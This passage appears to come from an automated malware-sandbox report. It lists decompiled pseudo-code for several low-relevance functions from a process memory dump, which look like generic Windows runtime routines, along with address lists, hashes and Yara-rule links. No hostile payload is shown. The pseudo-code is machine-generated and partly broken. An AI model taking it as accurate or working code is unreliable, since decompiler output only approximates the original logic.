                                                                          • Opcode Fuzzy Hash: 8d1127c20c3c0af841b7078fa624942888bccce7c3d3e08111eb0e954ea7c00e
                                                                          • Instruction Fuzzy Hash: 6231BE31A11A25DBDB2D9F6DC881AAABBF5FF45700B06806AE969CB350E730D850C791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011AA61C, Relevance: .1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E011AA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1250220);
				E011CD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1267b9c; // 0x0
				_t55 = L01194620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E011CD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1267b10 =  *0x1267b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x126536c; // 0x773b5368
					if( *_t51 != 0x1265368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1265368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x126536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E011AA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                          0x011aa61c
                                                                          0x011aa61e
                                                                          0x011aa623
                                                                          0x011aa628
                                                                          0x011aa62b
                                                                          0x011aa62d
                                                                          0x011aa648
                                                                          0x011aa64a
                                                                          0x011aa64f
                                                                          0x011e9b44
                                                                          0x011aa6ec
                                                                          0x011aa6f1
                                                                          0x011aa6f1
                                                                          0x011aa655
                                                                          0x011aa657
                                                                          0x011aa65a
                                                                          0x011aa65d
                                                                          0x011aa662
                                                                          0x011aa663
                                                                          0x011aa667
                                                                          0x011aa668
                                                                          0x011aa66d
                                                                          0x011aa706
                                                                          0x011aa706
                                                                          0x011e9bda
                                                                          0x011e9be6
                                                                          0x011e9beb
                                                                          0x00000000
                                                                          0x011e9beb
                                                                          0x011aa679
                                                                          0x011e9b7a
                                                                          0x00000000
                                                                          0x011e9b7a
                                                                          0x011aa683
                                                                          0x011aa6f4
                                                                          0x011aa6f7
                                                                          0x011aa6f9
                                                                          0x011aa6fd
                                                                          0x011aa6a0
                                                                          0x011aa6a0
                                                                          0x011aa6ad
                                                                          0x011aa6af
                                                                          0x011aa6b4
                                                                          0x011e9ba7
                                                                          0x011e9bac
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e9bc6
                                                                          0x011e9bce
                                                                          0x011e9bd1
                                                                          0x011e9bd3
                                                                          0x011e9bd3
                                                                          0x00000000
                                                                          0x011e9bd1
                                                                          0x011aa6bd
                                                                          0x011aa6c3
                                                                          0x011aa6c6
                                                                          0x011aa6d2
                                                                          0x011aa701
                                                                          0x011aa704
                                                                          0x00000000
                                                                          0x011aa704
                                                                          0x011aa6d4
                                                                          0x011aa6d6
                                                                          0x011aa6d9
                                                                          0x011aa6db
                                                                          0x011aa6e1
                                                                          0x011aa6e6
                                                                          0x011aa6e8
                                                                          0x011aa6e8
                                                                          0x011aa6ea
                                                                          0x00000000
                                                                          0x011aa6ea
                                                                          0x011aa688
                                                                          0x011aa692
                                                                          0x011aa694
                                                                          0x011aa699
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011aa69d
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 96a3772612ec5aef7edd0ff02eb4eda6ca77ab0b7bb3637740551ef13f530734
                                                                          • Instruction ID: c499331a9a733b66d37bdf240c60c035e855317b16a5a24317373880b4cd4738
                                                                          • Opcode Fuzzy Hash: 96a3772612ec5aef7edd0ff02eb4eda6ca77ab0b7bb3637740551ef13f530734
                                                                          • Instruction Fuzzy Hash: E2417BB9A00609DFCF19CF98E890B99BBF1BF49718F15C069E905AB384D775A901CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0119C182, Relevance: .1, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E0119C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01197D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01248D34(_v8, _t80);
					}
					E01192280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0118FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01248833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0118FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E011BB180();
						if(_a4 != 0) {
							E01192280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0119BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0119BB2D(_t16, _t15);
						E0119B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0118FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0118FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0118FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                          0x0119c18d
                                                                          0x0119c18f
                                                                          0x0119c191
                                                                          0x0119c19b
                                                                          0x0119c1a0
                                                                          0x0119c1d4
                                                                          0x0119c1de
                                                                          0x011e2d6e
                                                                          0x0119c1e4
                                                                          0x0119c1e4
                                                                          0x0119c1e4
                                                                          0x0119c1ec
                                                                          0x011e2d7d
                                                                          0x011e2d7d
                                                                          0x0119c1f3
                                                                          0x0119c1ff
                                                                          0x011e2d88
                                                                          0x011e2d8d
                                                                          0x011e2d94
                                                                          0x011e2d94
                                                                          0x011e2d9f
                                                                          0x011e2da4
                                                                          0x011e2dab
                                                                          0x011e2db0
                                                                          0x011e2db2
                                                                          0x011e2db3
                                                                          0x011e2db4
                                                                          0x011e2dbc
                                                                          0x011e2dc3
                                                                          0x011e2dc3
                                                                          0x0119c205
                                                                          0x0119c205
                                                                          0x0119c208
                                                                          0x0119c20e
                                                                          0x0119c211
                                                                          0x0119c216
                                                                          0x0119c219
                                                                          0x0119c21f
                                                                          0x0119c222
                                                                          0x0119c22c
                                                                          0x0119c234
                                                                          0x0119c23a
                                                                          0x0119c23f
                                                                          0x0119c245
                                                                          0x0119c24b
                                                                          0x0119c251
                                                                          0x0119c25a
                                                                          0x0119c276
                                                                          0x0119c27d
                                                                          0x0119c27d
                                                                          0x0119c25c
                                                                          0x0119c25c
                                                                          0x00000000
                                                                          0x0119c25e
                                                                          0x0119c1a4
                                                                          0x0119c1aa
                                                                          0x0119c1b3
                                                                          0x0119c265
                                                                          0x0119c26c
                                                                          0x0119c26c
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                          • Instruction ID: 736c9248ca50edaa4cb7afe9817f2aa202f78476321b415f98c0175308446574
                                                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                          • Instruction Fuzzy Hash: CE316B7260158BFEDB0CEBF4C480BE9F754BF62208F04816AD06C57201DB356906CBE2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011F7016, Relevance: .1, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 76%
                                                                          			E011F7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x126d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E011F6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E011F6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01197D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E011B9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E011BB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01194620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                          0x011f7016
                                                                          0x011f701e
                                                                          0x011f702b
                                                                          0x011f7033
                                                                          0x011f7037
                                                                          0x011f703c
                                                                          0x011f703e
                                                                          0x011f7041
                                                                          0x011f7045
                                                                          0x011f704a
                                                                          0x011f7050
                                                                          0x011f7055
                                                                          0x011f705a
                                                                          0x011f7062
                                                                          0x011f7062
                                                                          0x011f705a
                                                                          0x011f7064
                                                                          0x011f7064
                                                                          0x011f7067
                                                                          0x011f7071
                                                                          0x011f7096
                                                                          0x011f709b
                                                                          0x011f70a2
                                                                          0x011f70a6
                                                                          0x011f70a7
                                                                          0x011f70ad
                                                                          0x011f70b3
                                                                          0x011f70b6
                                                                          0x011f70bb
                                                                          0x011f70c3
                                                                          0x011f70c3
                                                                          0x011f70c6
                                                                          0x011f70cd
                                                                          0x011f70dd
                                                                          0x011f70e0
                                                                          0x011f70e2
                                                                          0x011f70e2
                                                                          0x011f70ee
                                                                          0x011f7101
                                                                          0x011f70f0
                                                                          0x011f70f9
                                                                          0x011f70f9
                                                                          0x011f710a
                                                                          0x011f710e
                                                                          0x011f7112
                                                                          0x011f7117
                                                                          0x011f7118
                                                                          0x011f7118
                                                                          0x011f70bb
                                                                          0x011f711d
                                                                          0x011f7123
                                                                          0x011f7131
                                                                          0x011f7131
                                                                          0x011f7136
                                                                          0x011f713d
                                                                          0x011f713e
                                                                          0x011f713f
                                                                          0x011f714a
                                                                          0x011f714a
                                                                          0x011f7084
                                                                          0x011f7088
                                                                          0x00000000
                                                                          0x011f708e
                                                                          0x011f708e
                                                                          0x011f7092
                                                                          0x00000000
                                                                          0x011f7092

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 932b7cd310c0a97f82588f14aec06813862e31ea29bf803af64418a91fff2e5f
                                                                          • Instruction ID: d436f56bbb55a7115a05f64db9729096914f7a5d8802fbd355e03bbdb39aa1d3
                                                                          • Opcode Fuzzy Hash: 932b7cd310c0a97f82588f14aec06813862e31ea29bf803af64418a91fff2e5f
                                                                          • Instruction Fuzzy Hash: FF31B6726087559BD329DF28C940A6AB7E5BF88700F044A2DFA95876D0E730E904C7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011AA70E, Relevance: .1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 92%
                                                                          			E011AA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1267b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1267b10 = 8;
					 *0x1267b14 = 0x1267b0c;
					 *0x1267b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E011AA990(0x1267b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L011AA840(__edx, __ecx, __ecx, _t52, 0x1267b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1267b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1267b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1267b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01194620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1267b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E011BF3E0(_t50,  *0x1267b14, _t8 >> 3);
						_t28 =  *0x1267b14; // 0x0
						__eflags = _t28 - 0x1267b0c;
						if(_t28 != 0x1267b0c) {
							L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1267b14 = _t50;
						_t48 = _v12;
						 *0x1267b10 = _t9;
						goto L6;
					}
					 *0x1267b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                          0x011aa713
                                                                          0x011aa714
                                                                          0x011aa717
                                                                          0x011aa71d
                                                                          0x011aa720
                                                                          0x011aa722
                                                                          0x011aa727
                                                                          0x011aa74a
                                                                          0x011aa754
                                                                          0x011aa75e
                                                                          0x011aa768
                                                                          0x011aa76a
                                                                          0x011aa773
                                                                          0x011aa78b
                                                                          0x011aa790
                                                                          0x011aa792
                                                                          0x011aa741
                                                                          0x011aa741
                                                                          0x011aa743
                                                                          0x011aa749
                                                                          0x011aa749
                                                                          0x011aa732
                                                                          0x011aa73a
                                                                          0x011aa797
                                                                          0x011aa79d
                                                                          0x011aa7a3
                                                                          0x011aa7a9
                                                                          0x011aa7b6
                                                                          0x011aa7bc
                                                                          0x011aa7ca
                                                                          0x011aa7e0
                                                                          0x011aa7e2
                                                                          0x011aa7e4
                                                                          0x011e9bf2
                                                                          0x00000000
                                                                          0x011e9bf2
                                                                          0x011aa7ed
                                                                          0x011aa7f2
                                                                          0x011aa800
                                                                          0x011aa805
                                                                          0x011aa80d
                                                                          0x011aa812
                                                                          0x011e9c08
                                                                          0x011e9c08
                                                                          0x011aa818
                                                                          0x011aa81b
                                                                          0x011aa821
                                                                          0x011aa824
                                                                          0x00000000
                                                                          0x011aa824
                                                                          0x011aa7ae
                                                                          0x00000000
                                                                          0x011aa7ae
                                                                          0x011aa73c
                                                                          0x011aa73e
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3ec682ca0374a9410e0b429e67eb783a2bd38b5ebed9d73daeb1877f2162e97
                                                                          • Instruction ID: cccf0eb18487411c1dbc67bf69ea1906f2499d0451c393c7b99239227ae3baaf
                                                                          • Opcode Fuzzy Hash: a3ec682ca0374a9410e0b429e67eb783a2bd38b5ebed9d73daeb1877f2162e97
                                                                          • Instruction Fuzzy Hash: EF3101B52106019FC729CF48FC84F2ABFF9FB84708F40895AE205C7294E371A941CBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A61A0, Relevance: .1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 97%
                                                                          			E011A61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E011A5E50(0x11567cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01249D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0117F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                          0x011a61b3
                                                                          0x011a61b5
                                                                          0x011a61bd
                                                                          0x011a61c3
                                                                          0x011a61c7
                                                                          0x011a61d2
                                                                          0x011a61ff
                                                                          0x011a61ff
                                                                          0x011a6201
                                                                          0x011a6207
                                                                          0x011a6207
                                                                          0x011a61d4
                                                                          0x011a61d9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a61df
                                                                          0x011a61e2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011a61e6
                                                                          0x011a61e8
                                                                          0x011a61ee
                                                                          0x011a61ee
                                                                          0x011a61f9
                                                                          0x011e762f
                                                                          0x011e7632
                                                                          0x011e7635
                                                                          0x011e7639
                                                                          0x011e7640
                                                                          0x011e766e
                                                                          0x011e7675
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e7681
                                                                          0x011e7689
                                                                          0x011e768d
                                                                          0x011e7691
                                                                          0x011e7695
                                                                          0x011e7699
                                                                          0x011e76af
                                                                          0x011e76b5
                                                                          0x011e76b7
                                                                          0x011e76b7
                                                                          0x011e76d7
                                                                          0x011e76dc
                                                                          0x00000000
                                                                          0x011e76dc
                                                                          0x011e76a2
                                                                          0x011e76a9
                                                                          0x011e7651
                                                                          0x011e7653
                                                                          0x011e7653
                                                                          0x011e7656
                                                                          0x011e7656
                                                                          0x00000000
                                                                          0x011e7656
                                                                          0x011e7644
                                                                          0x011e7646
                                                                          0x011e7648
                                                                          0x011e7648
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e906d9645b936684992333717e5f2f3612b539e9bc397b687870b531f0ee419
                                                                          • Instruction ID: 9ebceecfc0553cc92e5ba2eb69c1c75f2e1b5741da6e7b77194ba9c8395fa7e7
                                                                          • Opcode Fuzzy Hash: 4e906d9645b936684992333717e5f2f3612b539e9bc397b687870b531f0ee419
                                                                          • Instruction Fuzzy Hash: D2318E716057018FE368CF5DC904B26BBE5FB98B04F49496EE9949B391E770E804CBD2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0117AA16, Relevance: .1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E0117AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x126d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1267b9c; // 0x0
					_t53 = L01194620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E011BB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E011BF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01186C59(_t53, _t51, _t58) != 0) {
							_t28 = E011A5E50(0x115c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E011AB230(_v32, _v28, 0x115c2d8, 1,  &_v24);
								_t28 = E0117F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                          0x0117aa25
                                                                          0x0117aa29
                                                                          0x0117aa2d
                                                                          0x0117aa30
                                                                          0x0117aa37
                                                                          0x0117aa3c
                                                                          0x011d4458
                                                                          0x011d4458
                                                                          0x011d4472
                                                                          0x011d4474
                                                                          0x011d4476
                                                                          0x0117aa64
                                                                          0x0117aa74
                                                                          0x011d447c
                                                                          0x011d4483
                                                                          0x011d4492
                                                                          0x0117aa52
                                                                          0x0117aa54
                                                                          0x0117aa5e
                                                                          0x011d44a8
                                                                          0x011d44ad
                                                                          0x011d44af
                                                                          0x011d44b6
                                                                          0x011d44b6
                                                                          0x011d44b9
                                                                          0x011d44bc
                                                                          0x011d44cd
                                                                          0x011d44d3
                                                                          0x011d44d6
                                                                          0x011d44e1
                                                                          0x011d44e1
                                                                          0x011d44e6
                                                                          0x011d44e8
                                                                          0x011d44fb
                                                                          0x011d44fb
                                                                          0x011d44e8
                                                                          0x00000000
                                                                          0x0117aa5e
                                                                          0x011d4476
                                                                          0x0117aa42
                                                                          0x0117aa46
                                                                          0x0117aa48
                                                                          0x0117aa4c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 66a7f7884b7b64f4361d7eaf411b77cdcabf71988858a9a29d092f2d9e8fe327
                                                                          • Instruction ID: dcdac522578b046a32a215d541727e4266f76c041c3252e60e258f5b4e2387f2
                                                                          • Opcode Fuzzy Hash: 66a7f7884b7b64f4361d7eaf411b77cdcabf71988858a9a29d092f2d9e8fe327
                                                                          • Instruction Fuzzy Hash: 8731E371A0021AABCF19AF68DD81ABFB7B9EF44704B45406AF901E7650E734A951CBA0
